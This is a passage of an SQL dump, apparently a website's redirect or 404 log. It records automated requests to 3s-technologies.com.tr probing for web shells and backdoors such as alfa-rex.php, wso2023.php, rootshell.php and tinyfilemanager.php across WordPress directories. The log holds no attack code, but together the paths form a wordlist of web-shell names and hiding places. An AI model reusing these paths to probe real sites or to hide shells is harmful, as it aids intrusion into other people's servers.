00:00:00',301),(53424,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/secretstream/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:25:16','0000-00-00 00:00:00',301),(53425,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:25:17','0000-00-00 00:00:00',301),(53426,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:17','0000-00-00 00:00:00',301),(53427,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:18','0000-00-00 00:00:00',301),(53428,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/ge/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:25:19','0000-00-00 00:00:00',301),(53429,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/ge/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:20','0000-00-00 00:00:00',301),(53430,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/ge/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:25:21','0000-00-00 00:00:00',301),(53431,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:22','0000-00-00 00:00:00',301),(53432,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:23','0000-00-00 00:00:00',301),(53433,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/curve25519/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:24','0000-00-00 00:00:00',301),(53434,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/poly1305/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:24','0000-00-00 00:00:00',301),(53435,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/poly1305/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:25','0000-00-00 00:00:00',301),(53436,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/poly1305/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:26','0000-00-00 00:00:00',301),(53437,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:27','0000-00-00 00:00:00',301),(53438,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:25:28','0000-00-00 00:00:00',301),(53439,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/core32/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:29','0000-00-00 00:00:00',301),(53440,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/php52/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:25:30','0000-00-00 00:00:00',301),(53441,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/php52/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:31','0000-00-00 00:00:00',301),(53442,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/php52/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:32','0000-00-00 00:00:00',301),(53443,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:32','0000-00-00 00:00:00',301),(53444,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:33','0000-00-00 00:00:00',301),(53445,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/src/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:25:34','0000-00-00 00:00:00',301),(53446,'http://3s-technologies.com.tr/en/wp-includes/sodium_compat/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:35','0000-00-00 00:00:00',301),(53447,'http://3s-technologies.com.tr/en/wp-includes/spl-autoload-compat.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:25:36','0000-00-00 00:00:00',301),(53448,'http://3s-technologies.com.tr/en/wp-includes/style-engine.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:37','0000-00-00 00:00:00',301),(53449,'http://3s-technologies.com.tr/en/wp-includes/style-engine/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:25:39','0000-00-00 00:00:00',301),(53450,'http://3s-technologies.com.tr/en/wp-includes/style-engine/class-wp-style-engine-css-declarations.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:25:40','0000-00-00 00:00:00',301),(53451,'http://3s-technologies.com.tr/en/wp-includes/style-engine/class-wp-style-engine-css-rule.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:41','0000-00-00 00:00:00',301),(53452,'http://3s-technologies.com.tr/en/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:25:42','0000-00-00 00:00:00',301),(53453,'http://3s-technologies.com.tr/en/wp-includes/style-engine/class-wp-style-engine-processor.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:25:43','0000-00-00 00:00:00',301),(53454,'http://3s-technologies.com.tr/en/wp-includes/style-engine/class-wp-style-engine.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:44','0000-00-00 00:00:00',301),(53455,'http://3s-technologies.com.tr/en/wp-includes/taxonomy.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:25:45','0000-00-00 00:00:00',301),(53456,'http://3s-technologies.com.tr/en/wp-includes/template-canvas.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:46','0000-00-00 00:00:00',301),(53457,'http://3s-technologies.com.tr/en/wp-includes/template-loader.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:46','0000-00-00 00:00:00',301),(53458,'http://3s-technologies.com.tr/en/wp-includes/template.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:25:47','0000-00-00 00:00:00',301),(53459,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/about.php',NULL,'https://www.google.com/','',5,0,'2025-12-20 05:25:48','0000-00-00 00:00:00',301),(53460,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:25:49','0000-00-00 00:00:00',301),(53461,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:50','0000-00-00 00:00:00',301),(53462,'http://3s-technologies.com.tr/en/wp-includes/theme-previews.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:51','0000-00-00 00:00:00',301),(53463,'http://3s-technologies.com.tr/en/wp-includes/theme-templates.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:52','0000-00-00 00:00:00',301),(53464,'http://3s-technologies.com.tr/en/wp-includes/theme.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:53','0000-00-00 00:00:00',301),(53465,'http://3s-technologies.com.tr/en/wp-includes/update.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:25:54','0000-00-00 00:00:00',301),(53466,'http://3s-technologies.com.tr/en/wp-includes/vars.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:25:56','0000-00-00 00:00:00',301),(53467,'http://3s-technologies.com.tr/en/wp-includes/widgets.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:25:57','0000-00-00 00:00:00',301),(53468,'http://3s-technologies.com.tr/en/wp-includes/widgets/alfa-rex.php',NULL,'https://www.bing.com/','',5,0,'2025-12-20 05:25:58','0000-00-00 00:00:00',301),(53469,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-nav-menu-widget.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:25:59','0000-00-00 00:00:00',301),(53470,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-archives.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:26:00','0000-00-00 00:00:00',301),(53471,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-block.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:26:01','0000-00-00 00:00:00',301),(53472,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-calendar.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:02','0000-00-00 00:00:00',301),(53473,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-categories.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:26:03','0000-00-00 00:00:00',301),(53474,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-custom-html.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:03','0000-00-00 00:00:00',301),(53475,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-links.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:26:04','0000-00-00 00:00:00',301),(53476,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-media-audio.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:26:05','0000-00-00 00:00:00',301),(53477,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-media-gallery.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:26:06','0000-00-00 00:00:00',301),(53478,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-media-image.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:07','0000-00-00 00:00:00',301),(53479,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-media-video.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:26:08','0000-00-00 00:00:00',301),(53480,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-media.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:26:09','0000-00-00 00:00:00',301),(53481,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-meta.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:10','0000-00-00 00:00:00',301),(53482,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-pages.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:26:11','0000-00-00 00:00:00',301),(53483,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-recent-comments.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:26:12','0000-00-00 00:00:00',301),(53484,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-recent-posts.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:26:13','0000-00-00 00:00:00',301),(53485,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-rss.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:14','0000-00-00 00:00:00',301),(53486,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-search.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:26:15','0000-00-00 00:00:00',301),(53487,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-tag-cloud.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:26:16','0000-00-00 00:00:00',301),(53488,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-text.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:26:16','0000-00-00 00:00:00',301),(53489,'http://3s-technologies.com.tr/en/wp-includes/widgets/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:26:17','0000-00-00 00:00:00',301),(53490,'http://3s-technologies.com.tr/en/wp-includes/wp-class.vir.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:18','0000-00-00 00:00:00',301),(53491,'http://3s-technologies.com.tr/en/wp-includes/wp-configs.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:19','0000-00-00 00:00:00',301),(53492,'http://3s-technologies.com.tr/en/wp-includes/wp-db.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:20','0000-00-00 00:00:00',301),(53493,'http://3s-technologies.com.tr/en/wp-includes/wp-diff.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:26:21','0000-00-00 00:00:00',301),(53494,'http://3s-technologies.com.tr/en/wp-includes/wp-log1n.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:26:22','0000-00-00 00:00:00',301),(53495,'http://3s-technologies.com.tr/en/alfa-rex.php56',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:26:24','0000-00-00 00:00:00',301),(53496,'http://3s-technologies.com.tr/en/alfa-rex.php8',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:26:26','0000-00-00 00:00:00',301),(53497,'http://3s-technologies.com.tr/en/wp-content/plugins/html404/index.html',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:26:32','0000-00-00 00:00:00',301),(53498,'http://3s-technologies.com.tr/en/baxa1.php7',NULL,'https://www.google.com/','',3,0,'2025-12-20 05:27:07','0000-00-00 00:00:00',301),(53499,'http://3s-technologies.com.tr/en/wp-content/plugins/seoxx/randkeyword.php',NULL,'https://www.google.com/','',3,0,'2025-12-20 05:27:10','0000-00-00 00:00:00',301),(53500,'http://3s-technologies.com.tr/en/wp-content/plugins/dhon/newsfeed.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:27:11','0000-00-00 00:00:00',301),(53501,'http://3s-technologies.com.tr/en/wp-content/plugins/wpcall-button/button-image.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:27:12','0000-00-00 00:00:00',301),(53502,'http://3s-technologies.com.tr/en/wp-content/json.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:27:13','0000-00-00 00:00:00',301),(53503,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/zmfm.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:27:15','0000-00-00 00:00:00',301),(53504,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers/zmfm.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:27:16','0000-00-00 00:00:00',301),(53505,'http://3s-technologies.com.tr/en/wp-includes/pomo/zmfm.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:27:17','0000-00-00 00:00:00',301),(53506,'http://3s-technologies.com.tr/en/wp-includes/customize/zmfm.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:27:18','0000-00-00 00:00:00',301),(53507,'http://3s-technologies.com.tr/en/wp-includes/certificates/zmfm.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:27:19','0000-00-00 00:00:00',301),(53508,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/zmfm.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:27:20','0000-00-00 00:00:00',301),(53509,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/zmfm.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:27:21','0000-00-00 00:00:00',301),(53510,'http://3s-technologies.com.tr/en/p-includes/phpmailer/zmfm.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:27:22','0000-00-00 00:00:00',301),(53511,'http://3s-technologies.com.tr/en/wp-content/plugins/phpadmin/acp.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:27:22','0000-00-00 00:00:00',301),(53512,'http://3s-technologies.com.tr/en/wp-content/smm.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:27:23','0000-00-00 00:00:00',301),(53513,'http://3s-technologies.com.tr/en/wp-content/plugins/phpad/acp.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:27:24','0000-00-00 00:00:00',301),(53514,'http://3s-technologies.com.tr/en/wp-includes/widgets/index.php',NULL,'https://www.yahoo.com/','',7,0,'2025-12-20 05:27:33','0000-00-00 00:00:00',301),(53515,'http://3s-technologies.com.tr/en/index/index.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:27:36','0000-00-00 00:00:00',301),(53516,'http://3s-technologies.com.tr/en/about/index.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:27:36','0000-00-00 00:00:00',301),(53517,'http://3s-technologies.com.tr/en/as/index.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:27:38','0000-00-00 00:00:00',301),(53518,'http://3s-technologies.com.tr/en/fw.ph',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:27:50','0000-00-00 00:00:00',301),(53519,'http://3s-technologies.com.tr/en/csv.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:27:54','0000-00-00 00:00:00',301),(53520,'http://3s-technologies.com.tr/en/loger.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:28:05','0000-00-00 00:00:00',301),(53521,'http://3s-technologies.com.tr/en/vendor/htmlawed/htmlawed/gel4y.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:28:06','0000-00-00 00:00:00',301),(53522,'http://3s-technologies.com.tr/en/luuf.php',NULL,'https://www.yahoo.com/','',9,0,'2025-12-20 05:28:07','0000-00-00 00:00:00',301),(53523,'http://3s-technologies.com.tr/en/files/home.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:28:08','0000-00-00 00:00:00',301),(53524,'http://3s-technologies.com.tr/en/wp-content/plugins/upspy/up.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:29:16','0000-00-00 00:00:00',301),(53525,'http://3s-technologies.com.tr/en/wp-25.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:29:19','0000-00-00 00:00:00',301),(53526,'http://3s-technologies.com.tr/en/wp-configssss.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:29:20','0000-00-00 00:00:00',301),(53527,'http://3s-technologies.com.tr/en/wp-content/plugins/nigga/ngif.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:29:21','0000-00-00 00:00:00',301),(53528,'http://3s-technologies.com.tr/en/wp-content/themes/cay-van-phong/tinyfilemanager.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:22','0000-00-00 00:00:00',301),(53529,'http://3s-technologies.com.tr/en/wp-content/plugins/pluginss/wp-configssss.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:29:22','0000-00-00 00:00:00',301),(53530,'http://3s-technologies.com.tr/en/wp-configss1.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:29:23','0000-00-00 00:00:00',301),(53531,'http://3s-technologies.com.tr/en/wp-configss2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:29:24','0000-00-00 00:00:00',301),(53532,'http://3s-technologies.com.tr/en/wp-configss3.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:29:25','0000-00-00 00:00:00',301),(53533,'http://3s-technologies.com.tr/en/wp-xmlmp.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:29:27','0000-00-00 00:00:00',301),(53534,'http://3s-technologies.com.tr/en/haduh.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:29:29','0000-00-00 00:00:00',301),(53535,'http://3s-technologies.com.tr/en/kses.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:29:30','0000-00-00 00:00:00',301),(53536,'http://3s-technologies.com.tr/en/g3l4y.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:29:35','0000-00-00 00:00:00',301),(53537,'http://3s-technologies.com.tr/en/db.php?u',NULL,'https://www.yahoo.com/','',1,0,'2025-12-20 05:29:38','0000-00-00 00:00:00',301),(53538,'http://3s-technologies.com.tr/en/wp-edit.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:29:39','0000-00-00 00:00:00',301),(53539,'http://3s-technologies.com.tr/en/idk.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:40','0000-00-00 00:00:00',301),(53540,'http://3s-technologies.com.tr/en/alfax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:29:41','0000-00-00 00:00:00',301),(53541,'http://3s-technologies.com.tr/en/clen.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:29:42','0000-00-00 00:00:00',301),(53542,'http://3s-technologies.com.tr/en/caches.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:44','0000-00-00 00:00:00',301),(53543,'http://3s-technologies.com.tr/en/creates.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:29:45','0000-00-00 00:00:00',301),(53544,'http://3s-technologies.com.tr/en/fr.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:46','0000-00-00 00:00:00',301),(53545,'http://3s-technologies.com.tr/en/index404.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:46','0000-00-00 00:00:00',301),(53546,'http://3s-technologies.com.tr/en/indexof.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:47','0000-00-00 00:00:00',301),(53547,'http://3s-technologies.com.tr/en/stats.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:29:49','0000-00-00 00:00:00',301),(53548,'http://3s-technologies.com.tr/en/gec212.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:29:50','0000-00-00 00:00:00',301),(53549,'http://3s-technologies.com.tr/en/azdare.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:29:50','0000-00-00 00:00:00',301),(53550,'http://3s-technologies.com.tr/en/laymu.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:29:51','0000-00-00 00:00:00',301),(53551,'http://3s-technologies.com.tr/en/macibay.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:52','0000-00-00 00:00:00',301),(53552,'http://3s-technologies.com.tr/en/fdgfdgdsfd.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:29:53','0000-00-00 00:00:00',301),(53553,'http://3s-technologies.com.tr/en/legal.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:29:55','0000-00-00 00:00:00',301),(53554,'http://3s-technologies.com.tr/en/yuuki2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:29:56','0000-00-00 00:00:00',301),(53555,'http://3s-technologies.com.tr/en/rootshell.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:29:57','0000-00-00 00:00:00',301),(53556,'http://3s-technologies.com.tr/en/rexx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:29:58','0000-00-00 00:00:00',301),(53557,'http://3s-technologies.com.tr/en/rad.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:30:08','0000-00-00 00:00:00',301),(53558,'http://3s-technologies.com.tr/en/rename.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:10','0000-00-00 00:00:00',301),(53559,'http://3s-technologies.com.tr/en/wso2023.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:30:16','0000-00-00 00:00:00',301),(53560,'http://3s-technologies.com.tr/en/cool.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:16','0000-00-00 00:00:00',301),(53561,'http://3s-technologies.com.tr/en/ey.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:17','0000-00-00 00:00:00',301),(53562,'http://3s-technologies.com.tr/en/wp-clon.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:22','0000-00-00 00:00:00',301),(53563,'http://3s-technologies.com.tr/en/blvck.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:30:23','0000-00-00 00:00:00',301),(53564,'http://3s-technologies.com.tr/en/domain.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:23','0000-00-00 00:00:00',301),(53565,'http://3s-technologies.com.tr/en/mano.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:30:25','0000-00-00 00:00:00',301),(53566,'http://3s-technologies.com.tr/en/sx.php',NULL,'https://www.google.com/','',20,0,'2025-12-20 05:30:26','0000-00-00 00:00:00',301),(53567,'http://3s-technologies.com.tr/en/db-config.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:27','0000-00-00 00:00:00',301),(53568,'http://3s-technologies.com.tr/en/gac.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:30:28','0000-00-00 00:00:00',301),(53569,'http://3s-technologies.com.tr/en/shelss.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:29','0000-00-00 00:00:00',301),(53570,'http://3s-technologies.com.tr/en/xzd.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:30:30','0000-00-00 00:00:00',301),(53571,'http://3s-technologies.com.tr/en/xzdd.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:30:31','0000-00-00 00:00:00',301),(53572,'http://3s-technologies.com.tr/en/wp-mailcek.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:30:32','0000-00-00 00:00:00',301),(53573,'http://3s-technologies.com.tr/en/revisi.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:33','0000-00-00 00:00:00',301),(53574,'http://3s-technologies.com.tr/en/degesaciihaxor.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:30:33','0000-00-00 00:00:00',301),(53575,'http://3s-technologies.com.tr/en/devil.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:30:35','0000-00-00 00:00:00',301),(53576,'http://3s-technologies.com.tr/en/hhh.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:30:36','0000-00-00 00:00:00',301),(53577,'http://3s-technologies.com.tr/en/sambernyawa.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:30:37','0000-00-00 00:00:00',301),(53578,'http://3s-technologies.com.tr/en/data-user.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:38','0000-00-00 00:00:00',301),(53579,'http://3s-technologies.com.tr/en/301.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:39','0000-00-00 00:00:00',301),(53580,'http://3s-technologies.com.tr/en/zec.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:40','0000-00-00 00:00:00',301),(53581,'http://3s-technologies.com.tr/en/sct.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:30:42','0000-00-00 00:00:00',301),(53582,'http://3s-technologies.com.tr/en/wp-smail.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:30:44','0000-00-00 00:00:00',301),(53583,'http://3s-technologies.com.tr/en/shell_lock.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:30:45','0000-00-00 00:00:00',301),(53584,'http://3s-technologies.com.tr/en/teamadmin.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:45','0000-00-00 00:00:00',301),(53585,'http://3s-technologies.com.tr/en/lux.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 05:30:46','0000-00-00 00:00:00',301),(53586,'http://3s-technologies.com.tr/en/sang3.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:30:47','0000-00-00 00:00:00',301),(53587,'http://3s-technologies.com.tr/en/pirja.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:30:49','0000-00-00 00:00:00',301),(53588,'http://3s-technologies.com.tr/en/module.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:50','0000-00-00 00:00:00',301),(53589,'http://3s-technologies.com.tr/en/ab.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:30:50','0000-00-00 00:00:00',301),(53590,'http://3s-technologies.com.tr/en/su.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:30:51','0000-00-00 00:00:00',301),(53591,'http://3s-technologies.com.tr/en/ar.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:30:52','0000-00-00 00:00:00',301),(53592,'http://3s-technologies.com.tr/en/sam.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:53','0000-00-00 00:00:00',301),(53593,'http://3s-technologies.com.tr/en/ikeh.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:55','0000-00-00 00:00:00',301),(53594,'http://3s-technologies.com.tr/en/mega.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:30:56','0000-00-00 00:00:00',301),(53595,'http://3s-technologies.com.tr/en/syd.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:30:57','0000-00-00 00:00:00',301),(53596,'http://3s-technologies.com.tr/en/green.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:30:59','0000-00-00 00:00:00',301),(53597,'http://3s-technologies.com.tr/en/theme-single.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:31:00','0000-00-00 00:00:00',301),(53598,'http://3s-technologies.com.tr/en/class_appfun.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:31:02','0000-00-00 00:00:00',301),(53599,'http://3s-technologies.com.tr/en/wp-admin/images/class_appfun.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:31:03','0000-00-00 